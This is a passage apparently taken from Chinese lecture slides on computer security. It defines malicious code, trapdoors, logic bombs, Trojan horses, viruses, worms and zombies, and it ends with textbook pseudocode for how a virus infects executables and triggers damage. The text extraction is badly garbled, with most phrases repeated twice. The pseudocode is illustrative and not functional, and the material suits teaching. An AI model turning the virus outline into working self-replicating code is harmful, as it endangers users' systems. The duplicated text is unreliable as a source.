48、存储介质和算机程序，恶意代码是指经过存储介质和网络实现计算机系统间的传播，未经授权网络实现计算机系统间的传播，未经授权破坏计算机系统完整性的代码，它的重要破坏计算机系统完整性的代码，它的重要特点是非授权性和破坏性。特点是非授权性和破坏性。 陷阱门是某个程序的秘密入口，通过该入口启动陷阱门是某个程序的秘密入口，通过该入口启动程序，可以绕过正常的访问控制过程；程序，可以绕过正常的访问控制过程； 逻辑炸弹是包含在正常应用程序中的一段恶意代逻辑炸弹是包含在正常应用程序中的一段恶意代码，当某种条件出现，如到达某个特定日期，增加或码，当某种条件出现，如到达某个特定日期，增加或删除某个特定文件等，将激发这一

49、段恶意代码；删除某个特定文件等，将激发这一段恶意代码； 特洛伊木马也是包含在正常应用程序中的一段恶特洛伊木马也是包含在正常应用程序中的一段恶意代码，一旦执行这样的应用程序，将激发恶意代码。意代码，一旦执行这样的应用程序，将激发恶意代码。顾名思义，这一段恶意代码的功能主要在于削弱系统顾名思义，这一段恶意代码的功能主要在于削弱系统的安全控制机制；的安全控制机制； 这里的病毒是狭义上的恶意代码类型，单指那种这里的病毒是狭义上的恶意代码类型，单指那种既具有自我复制能力，又必须寄生在其他实用程序中既具有自我复制能力，又必须寄生在其他实用程序中的恶意代码的恶意代码 ； 蠕虫的特点有两个，一是独立完整程序，

50、二是能蠕虫的特点有两个，一是独立完整程序，二是能够自动激活；够自动激活； Zombie Zombie（俗称僵尸）是一种具有秘密接管其他连（俗称僵尸）是一种具有秘密接管其他连接在网络上的系统，并以此系统为平台发起对某个特接在网络上的系统，并以此系统为平台发起对某个特定系统的攻击的功能的恶意代码。定系统的攻击的功能的恶意代码。 program V:=program V:=goto main;goto main; 1234567; 1234567; subroutine infect-executable:= subroutine infect-executable:= loop; loop; fi

51、le:=get-random-executable-file; file:=get-random-executable-file; if(first-line-of-file=1234567) if(first-line-of-file=1234567) then goto loop then goto loop else prepend V to file; else prepend V to file; subroutine do-damage:= subroutine do-damage:= whatever damage is to be done whatever damage is to be done subroutine trigger-pulled:= subroutine trigger-pulled:= return true if some condition holds return true if some condition holds main: main-program:=main: main-program